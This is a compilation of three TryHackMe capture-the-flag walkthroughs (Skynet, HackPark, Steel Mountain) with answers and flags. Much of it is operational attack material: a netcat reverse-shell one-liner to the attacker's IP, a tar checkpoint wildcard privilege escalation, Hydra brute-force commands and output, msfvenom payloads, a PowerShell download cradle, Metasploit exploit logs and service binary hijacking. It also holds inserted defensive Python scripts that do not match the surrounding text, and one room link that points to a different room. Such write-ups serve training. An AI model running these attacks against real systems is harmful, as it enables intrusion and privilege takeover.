thm-terminator-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called terminator at

Hasta la vista, baby.

Are you able to compromise this Terminator themed machine?

You can follow our official walkthrough for this challenge on our blog.


#1 What is Miles' password for his emails?
cyborg007haloterminator
#2 What is the hidden directory?
#3 What is the vulnerability called when you can include a remote file for malicious purposes?
remote file inclusion
#4 What is the user flag?
#5 What is the root flag?
3f0372db24753accc7179a282cd6a949

Skynet Writeup

Follow along with this writeup, and deploy your own instance of Skynet! https://tryhackme.com/room/skynet
Summary:

  • Scan ports using nmap
  • Use GoBuster to enumerate directories
  • Experiment with SMBMap to find Samba shares
  • Use enumerated credentials to read emails
  • Exploit CMS RFI vulnerability
  • Exploit tar wildcards for privilege escalation

Let's first begin by enumerating the machine as much as possible, using nmap.

nmap -sV <ip>

We can see that there is a web server running; upon visiting it we see the following:

“Skynet” is an artificial neural network-based conscious group mind and artificial general intelligence system

Let's use GoBuster to locate any directories!

gobuster -u http://<ip> -w <wordlist_location> -t 40

Sometimes, we’re confident that there is something to be found and we waste too much time on it. Often, there are rabbit holes that can trip you up. Make sure to take breaks if you get stuck and try different approaches.

Going back to the drawing board: we saw that the POP3 and IMAP ports were open. I wonder what else could potentially be found? Remember what I said above!

SMBMap allows users to enumerate samba share drives across an entire domain. This program is available on all Kali Linux machines. If you don’t have the time or resources to set your own Kali Linux machine up, you can deploy your own and control it within your browser. Check it out.

The scan reveals a share called “anonymous” that has read access. Let's connect to the share and investigate.

smbclient //<ip>/anonymous

Log1.txt contains possible passwords and there is an SMB share called milesdyson. We have some potential credentials here… But SSH is disabled! What else can we do?

An earlier GoBuster scan revealed SquirrelMail!

Gasp! Reading his emails reveals a Samba password reset!

Let's log into Miles' share and see what interesting things we can find! You should find a file that gives you information about a new CMS.

Visiting the CMS reveals Miles Dyson's Personal Page.

If you use GoBuster on the /45kra24zxs28v3yd/ directory, you will reveal an /administrator page. This reveals a Cuppa CMS!

Looking at the source code will give you an indication of the CMS’ version. After some online research, there is a public exploit for it! https://www.exploit-db.com/exploits/25971

Get a shell script and change the IP to be your tun0 IP (ifconfig), host it locally using Python, use netcat to listen for a session and then remotely include this shell on the webserver.

The screenshot below explains the correct steps in obtaining a low privilege shell by exploiting the RFI vulnerability! You can download a PHP reverse shell from PentestMonkey.

So what's actually going on here? In the CMS code, there is a bit of PHP that includes whatever file the request names:

<?php include($_REQUEST["urlConfig"]); ?>

However, because the path comes straight from the request, this allows us to include our own shells (or even a file on the system such as /etc/passwd). For a more detailed explanation, please read the exploit-db description.
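A log-side detection for the include() above, added here as an example (it is not from the writeup or from Cuppa CMS): it scans Apache combined-format access lines for the urlConfig parameter and classifies what each value would make include() load. The log lines, IP addresses and the VULN_SCRIPT.php path are constructed placeholders.

```python
r"""Detect file-inclusion attempts against the `urlConfig` parameter in
Apache combined access logs.

Because the CMS hands the raw request value to include(), the value itself
tells a defender what was attempted: a URL means remote file inclusion, a
PHP stream wrapper means content smuggled through the request, and a
traversal or absolute path means local file disclosure. Note that the code
uses $_REQUEST, so POSTed values never reach the access log; those need
request-body logging (a WAF or mod_security) to be seen at all.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines; VULN_SCRIPT.php stands in for the real script path.
SAMPLE_LOG = r"""
10.0.0.5 - - [17/Apr/2020:03:30:01 +0000] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Apr/2020:03:31:12 +0000] "GET /45kra24zxs28v3yd/administrator/VULN_SCRIPT.php?urlConfig=http://10.0.0.9:8000/shell.php HTTP/1.1" 200 5123 "-" "curl/7.68.0"
10.0.0.9 - - [17/Apr/2020:03:31:40 +0000] "GET /45kra24zxs28v3yd/administrator/VULN_SCRIPT.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 2210 "-" "curl/7.68.0"
10.0.0.9 - - [17/Apr/2020:03:32:05 +0000] "GET /45kra24zxs28v3yd/administrator/VULN_SCRIPT.php?urlConfig=http%3A%2F%2F10.0.0.9%3A8000%2Fshell.php HTTP/1.1" 200 5123 "-" "curl/7.68.0"
10.0.0.7 - - [17/Apr/2020:03:33:00 +0000] "GET /45kra24zxs28v3yd/administrator/VULN_SCRIPT.php?urlConfig=config.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PARAM = "urlConfig"
# PHP stream wrappers that include() would happily open.
PHP_WRAPPERS = ("php:", "data:", "phar:", "expect:", "glob:", "zip:", "compress.zlib:", "file:")
# Any other URL scheme (two or more letters, so a Windows drive letter is not a scheme).
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.IGNORECASE)
DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")


def classify(value):
    """Say what include() would load for this (already percent-decoded) value."""
    v = unquote(value).strip()          # second decode catches double encoding
    if v.lower().startswith(PHP_WRAPPERS):
        return "wrapper"
    if v.startswith("/") or DRIVE_RE.match(v):
        return "absolute"
    if SCHEME_RE.match(v):
        return "remote"                 # http://, https://, ftp://, ...
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    return "relative"                   # plausibly the application's own use; still review


def scan_log(text):
    """Return one finding per request that carried the vulnerable parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(VULN_PARAM, []):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "value": value,
                "kind": classify(value),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['kind']:10} {f['value']}")
```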

Now that we have a shell, we can get the user flag. Next step is to escalate our privileges to root!

Upon enumerating the Linux machine, we can see there are several regular cronjobs running.

So the file /home/milesdyson/backups/backup.sh is being called every minute. Inspecting this file:

This starts a shell, navigates to the /var/www/html directory and creates a backup of everything in it.

Well, believe it or not, this creates a vulnerability that we can use to execute code. HelpNetSecurity best explains how this works, but in essence: the shell expands tar's wildcard into filenames, tar treats any filename that starts with a dash as an option, and tar's checkpoint actions can execute commands.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Then open up a netcat session and you will receive a shell as root!
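A defender's audit of the backup pattern above, added here as an example (not part of the original writeup): it lists the directory entries that `tar cf backup.tgz *` would parse as options, builds a cron line in which no filename can ever become an argument, and archives without a shell at all. The filenames are constructed to mirror the web root described; the paths are the ones the writeup names.

```python
"""Audit a web root that a root cron job archives with `tar cf backup.tgz *`.

The shell expands `*` into one argument per filename, and tar parses any
argument beginning with `-` as an option. A file named
`--checkpoint-action=exec=sh shell.sh` is therefore an instruction to tar,
not data to archive. The functions below list such names, build an argv
that tar cannot misread, and archive the directory without a shell.
"""
import os
import shlex
import tarfile
import tempfile

# Constructed sample: filenames mirroring the web root in the writeup,
# including the two names the cron job would have parsed as options.
SAMPLE_NAMES = [
    "index.html",
    "style.css",
    "45kra24zxs28v3yd",
    "--checkpoint-action=exec=sh shell.sh",
    "--checkpoint=1",
    "-rf",
]


def option_like_names(names):
    """Names that `*` expansion would hand to tar as options, not files."""
    return [n for n in names if n.startswith("-")]


def checkpoint_names(names):
    """The subset of option-like names that drive tar's checkpoint actions."""
    return [n for n in option_like_names(names) if n.startswith("--checkpoint")]


def safe_tar_argv(archive, workdir):
    """An argv in which no directory entry is ever an argument.

    -C runs tar inside workdir, `--` ends option parsing, and `.` names the
    whole directory, so nothing from the filesystem reaches tar's option parser.
    """
    return ["tar", "-cf", archive, "-C", workdir, "--", "."]


def shell_line(argv):
    """Render the argv as a line safe to paste into a cron script."""
    return " ".join(shlex.quote(a) for a in argv)


def archive_with_tarfile(names, workdir, archive):
    """Archive without invoking a shell: names are data, never arguments."""
    with tarfile.open(archive, "w:gz") as tf:
        for name in names:
            tf.add(os.path.join(workdir, name), arcname=name)
    with tarfile.open(archive, "r:gz") as tf:
        return sorted(tf.getnames())


def demo():
    """Create the sample web root in a temp dir and archive it safely."""
    with tempfile.TemporaryDirectory() as workdir, tempfile.TemporaryDirectory() as out:
        for name in SAMPLE_NAMES:
            with open(os.path.join(workdir, name), "w", encoding="utf-8") as fh:
                fh.write("sample content\n")
        return archive_with_tarfile(SAMPLE_NAMES, workdir, os.path.join(out, "backup.tgz"))


if __name__ == "__main__":
    print("option-like names:", option_like_names(SAMPLE_NAMES))
    print("checkpoint names:", checkpoint_names(SAMPLE_NAMES))
    print("hardened cron line:",
          shell_line(safe_tar_argv("/home/milesdyson/backups/backup.tgz", "/var/www/html")))
    print("archived:", demo())
```

The audit is also worth running against any directory a privileged job processes with a wildcard, since the cron job here runs as root over a directory the web server user can write to.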

thm-hackpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called hackpark at

Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

This room will cover brute-forcing an account's credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.


#1 Deploy the machine and access its web server.
#2 What's the name of the clown displayed on the homepage?

 

[Task 2] Using Hydra to brute-force a login

Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!

Brute-forcing can mean trying every possible combination for a password. Dictionary attacks are also a type of brute-forcing, where we iterate through a wordlist to obtain the password.


#1 We need to find a login page to attack and identify what type of request the form is making to the web server. Typically, a form makes one of two types of request: a GET request, which is used to request data from a web server, and a POST request, which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).

What request type is the Windows website login form using?

#2 Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

Guess a username, choose a password wordlist and gain credentials to a user account!

#3 Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).

However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.

Below is a mini cheatsheet:

hydra -P <wordlist> -v <ip> <protocol>
  Brute force against a protocol of your choice.

hydra -v -V -u -L <username list> -P <password list> -t 1 <ip> <protocol>
  You can use Hydra to brute-force usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts.)

hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>
  Attack a Windows Remote Desktop with a password list.

hydra -l <username> -P <password list> <ip> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
  Craft a more specific request for Hydra to brute force.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

E:\PENTEST\thc-hydra>hydra -l admin -P rock.txt 10.10.140.111 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-06-03 19:49:39
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:0), ~6 try per task
[DATA] attacking http-post-form://10.10.140.111:80/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=ESusfeeAgg5XBAqn0il8cmjNBRNgyyn40k5fTw0EqohxNhMx%2BCbwAu%2FbXDgB%2BeAzswA0lJQlx7qkuILGVgmrciakyHYQksatA0zD%2B%2FQuEbsGFiAEtKJ9foI4CfgcdADkjq%2FYtzt5fJ9wn4Vzq%2Ff%2F%2Bj%2BttNl2bQGbn9kHIOWbeVecULsFeXHxIXw%2F6IDy3MT2DZbc8ScPbiJqkB9NP91hyX6QOlcbAOih9lnzG4%2B69SszAzzAeW5Jt2zIdFJeXmswYiGlaNLvW1zm%2BLW5bMbR2HxMImHT5PipZegaMiNIs4gt6r9RH53qbh0ysABzLfpXlfWT5noJGq%2BhnOUYfAjJC1pnawT1wACYrH6wtRS7oCuKVTQD&__EVENTVALIDATION=iNrpLaCNYEuyJut8PS4B4E3PjQdZpobW1J6AnunCxl%2FNDwPNiZz3gj3VqybxORpHJasanlkFY8Dp3JM8U%2ByD8K4B%2Bp4j7tOAsPbMF1EVjsn4rxuEXIlFgq7uUEefXKTWB0k3zhuIcl%2BcJqFBFUGXy1CVeZ8tuqW7wLkmhrAcuzSGavTs&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.140.111   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-06-03 19:49:52

E:\PENTEST\thc-hydra>
Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons: “path to the login form page : request body : error message indicating failure”.

To get this information, open the Network tab in the developer tools, send one login request with random credentials and inspect it by clicking “Edit and Resend”.



The request body can be found in the “Request Body” section at the bottom. Before pasting it into the terminal we need to find where the credentials are used, so Hydra knows where to insert its guesses.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra.

One last piece of information Hydra needs is a message indicating failure, so it can tell when the guessed password is correct. On a failed login, the site shows “Login failed”. That's exactly the string we need.

After running Hydra and obtaining the password, we can log into BlogEngine as admin 🔥


In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!

Exploit-Database is a CVE (Common Vulnerabilities and Exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researchers. It is owned by Offensive Security (who are responsible for OSCP and Kali).


#1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
#2 Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE?

#3 Using the public exploit, gain initial access to the server.

Who is the webserver running as?


In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.


#1 Our netcat session is a little unstable, so let's generate another reverse shell using msfvenom.

If you don’t know how to do this, I suggest completing up to task 3 in our Metasploit room first!

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

#2 You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.

What is the OS version of this windows machine?

#3 Further enumerate the machine.

What is the name of the abnormal service running?

#4 What is the name of the binary you’re supposed to exploit?
#5 Using this abnormal service, escalate your privileges!

What is the user flag (on Jeff's Desktop)?

#6 What is the root flag?

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


#1 Now we can generate a more stable shell using msfvenom, instead of using a meterpreter. This time let's set our payload to windows/shell_reverse_tcp.
#2 After generating our payload we need to pull this onto the box using powershell.

Tip: It’s common to find C:\Windows\Temp is world writable!
#3 Now you know how to pull files from your machine to the victim's machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here.)

WinPEAS is a great tool which enumerates the system and recommends potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Tip: You can execute these files by using .\filename.exe

Using winPEAS, what was the original install time of the server? (This is a date and time.)

Found from the cmd shell with: systeminfo

Writeup:

Try it for yourself here.

Deployment and reverse image search

After the machine deployed I opened the website and got prompted by this friendly clown:

I guess most of you recognized him right off the bat as Pennywise from the Movie IT. I didn’t, so I used reverse image search to find who he is. Google didn’t provide any good output, but TinEye did.


Compromise the machine

The first thing to do is to check the version of BlogEngine. It can be found in the “About” tab. A quick Google search for this version revealed this exploit on exploit-db.

Example search for an exploit with the “searchsploit” command on Kali Linux. We’ll use the fourth result.

Inside the exploit, a comment specifies exactly what we need to do to get it running. First, change the address and port of the attacker to yours.

Rename the exploit to PostView.ascx. It should be uploaded by editing a post:

To upload the file, edit the only post on the website and click the folder icon marked above.

To get the reverse shell we only need to start a Netcat listener and navigate to http://10.10.147.54/?theme=../../App_Data/files

There is nothing prettier than getting a reverse shell

By running whoami we see that the server is running as “iis apppool\blog”.

Privilege Escalation [without Metasploit]

Before scanning the machine to find a way to escalate privileges, let's get a stable shell. We will create a reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]

Now the payload is ready. Start a small web server so the machine can download the executable: python3 -m http.server.

We don't have write permissions in the current folder, so before downloading, navigate to C:\Windows\Temp. To download, use this command (DownloadFile needs the URL and the local file name; the port is the one your http.server is listening on):

powershell "(New-Object System.Net.WebClient).DownloadFile('http://[your_ip]:[http_server_port]/[shell_name.exe]', '[shell_name.exe]')"

Amazing. Now listen on the port you specified previously and run the executable.

A stable reverse shell

The same way we sent this reverse shell we can send an enumeration script. I used winPEAS.

Analyzing the results of the enumeration took a while. Under the “Running Processes” section there is a process named “Message.exe”. Further inspection shows that it keeps stopping and restarting. If we can replace Message.exe with our reverse shell executable, we can get a shell with higher privileges.

Message.exe can be found under C:\Program Files (x86)\SystemScheduler. Rename Message.exe to Message.bak, upload your shell and rename it to Message.exe. Don't forget to listen on the port you specified!

Wait a little, and voilà! We have a shell. Running whoami returns:

These permissions are enough to access both “jeff” and “Administrator” that hold the user and root flags.

Author: Jacco Straathof


thm-steelmountain-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let's play TryHackMe's Steel Mountain at

https://tryhackme.com/room/gatekeeper

Credits to the room creator/s.

TryHackMe – Steel Mountain

[Task 1] Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.


#1 Deploy the machine.

Who is the employee of the month?


[Task 2] Initial Access

Now that you have deployed the machine, let's get an initial shell!


#1 Scan the machine with nmap. What is the other port running a web server on?
#2 Take a look at the other web server. What file server is running?
#3 What is the CVE number to exploit this file server?
#4 Use Metasploit to get an initial shell. What is the user flag?

[Task 3] Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!


#1 To enumerate this machine, we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and determine any abnormalities: “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

#2 Pay close attention to the CanRestart option that is set to true. What is the name of the service with the unquoted service path?
#3 The CanRestart option being true allows us to restart a service on the system, and the directory of the application is also writable. This means we can replace the legitimate application with our malicious one and restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as a Windows executable.

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

#4 What is the root flag?

[Task 4] Access and Escalation Without Metasploit

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to


#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

#2 Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPEAS, we see that it points us towards unquoted paths. We can also see that it gives us the name of the service that is running.

What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*

#3 Now let's escalate to Administrator with our new-found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service, which we can do like so:

sc stop AdvancedSystemCareService9

Shortly followed by:

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!


Here's the writeup:

As always, we start with an nmap scan.

kali@kali:~/thm$ nmap -A 10.10.55.161 -oN steelmountain.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-17 03:30 EDT
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.92% done; ETC: 03:31 (0:00:00 remaining)
Stats: 0:01:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 03:31 (0:00:00 remaining)
Nmap scan report for 10.10.55.161
Host is up (0.029s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-04-17T07:31:14+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:88:1e:b5:04:44 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020-04-17T07:31:09
|_ start_date: 2020-04-17T06:48:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.78 seconds
kali@kali:~/thm$



msf5 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.11.3.122:4444 
[*] Using URL: http://0.0.0.0:8080/PDRAuFa4r7C8h
[*] Local IP: http://192.168.1.113:8080/PDRAuFa4r7C8h
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /PDRAuFa4r7C8h
[*] Sending stage (180291 bytes) to 10.10.55.161
[*] Meterpreter session 1 opened (10.11.3.122:4444 -> 10.10.55.161:62506) at 2020-04-17 02:50:52 -0400
[!] Tried to delete %TEMP%\MGKQmXpmJuEcFF.vbs, unknown result
[*] Server stopped.

meterpreter > cd /users
meterpreter > cd bill
meterpreter > cd desktop
meterpreter > ls
Listing: C:\users\bill\desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 07:07:07 -0400 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 08:42:38 -0400 user.txt

meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365



I added Invoke-AllChecks to the bottom of the PowerUp.ps1 file.

Another way to find this: my next move was to use wmic to check for unquoted service paths. The syntax I used was:

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """
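A detection script for the unquoted-path check above, added here as an example (it is not from the writeup, PowerUp or winPEAS): it parses wmic output in the space-collapsed form it takes in this transcript, flags services whose unquoted binary path contains a space, lists the directories Windows would probe before the real executable (the ones whose ACLs must deny writes to non-admins), and emits the sc config fix. The sample lines are constructed from the listing further down; the “Vendor Agent” line is made up to show the quoted, safe case.

```python
r"""Find unquoted service binary paths in wmic output and produce the fix.

When a service ImagePath is unquoted and contains spaces, Windows resolves
the executable by trying each space-delimited prefix in turn (C:\Program.exe,
C:\Program Files.exe, ...). If a low-privileged user can write to any of
those directories, the service starts that user's binary with the service's
privileges. Quoting the path removes the ambiguity.
"""
import re

# Constructed sample: lines in the collapsed form they take in the transcript
# (display name, service name, path plus arguments, start mode, separated by
# single spaces), plus one made-up quoted service to show the safe case.
SAMPLE_WMIC = r"""
Advanced SystemCare Service 9 AdvancedSystemCareService9 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe Auto
Application Host Helper Service AppHostSvc C:\Windows\system32\svchost.exe -k apphost Auto
AWS Lite Guest Agent AWSLiteAgent C:\Program Files\Amazon\XenTools\LiteAgent.exe Auto
Wired AutoConfig dot3svc C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted Manual
IObit Uninstaller Service IObitUnSvr C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe Auto
LiveUpdate LiveUpdateSvc C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe Auto
Distributed Transaction Coordinator MSDTC C:\Windows\System32\msdtc.exe Auto
Power Power C:\Windows\system32\svchost.exe -k DcomLaunch Auto
Vendor Agent VendorSvc "C:\Program Files\Vendor\svc.exe" /run Auto
"""

# display name (may contain spaces), service name, path (+ arguments), start mode
LINE_RE = re.compile(
    r'^(?P<display>.+?) (?P<name>\S+) (?P<path>"?[A-Za-z]:\\.*?) '
    r"(?P<start>Auto|Manual|Disabled|Boot|System)$"
)
EXE_RE = re.compile(r"(.*?\.exe)\b(.*)", re.IGNORECASE)


def parse_wmic(text):
    """Split collapsed wmic lines into their four fields."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def executable_part(pathname):
    """Separate the executable from its arguments, honouring quotes."""
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return pathname[1:end], pathname[end + 1:].strip()
    m = EXE_RE.match(pathname)
    if m:
        return m.group(1), m.group(2).strip()
    return pathname, ""


def is_unquoted_vulnerable(pathname):
    """True when the path is unquoted and the executable itself contains a space."""
    if pathname.startswith('"'):
        return False
    exe, _ = executable_part(pathname)
    return " " in exe


def probe_paths(exe):
    """Executables Windows would try before the real one, in order.

    Every directory on this list must deny write access to non-admin users.
    """
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def fix_command(name, pathname):
    """The sc command that quotes the binary path (arguments preserved)."""
    exe, args = executable_part(pathname)
    binpath = f'\\"{exe}\\"' + (f" {args}" if args else "")
    return f'sc config {name} binPath= "{binpath}"'


def audit(text, skip_windows_dir=True):
    """One finding per unquoted-path service, mirroring the findstr filter above."""
    findings = []
    for svc in parse_wmic(text):
        if skip_windows_dir and svc["path"].lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_vulnerable(svc["path"]):
            exe, _ = executable_part(svc["path"])
            findings.append({
                "name": svc["name"],
                "start": svc["start"],
                "exe": exe,
                "probe_paths": probe_paths(exe),
                "fix": fix_command(svc["name"], svc["path"]),
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_WMIC):
        print(f["name"], f["start"])
        for p in f["probe_paths"]:
            print("  would try:", p)
        print("  fix:", f["fix"])
```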

With this information, I used msfvenom to generate a malicious binary.

kali@kali:~/thm$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.3.122 LPORT=443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
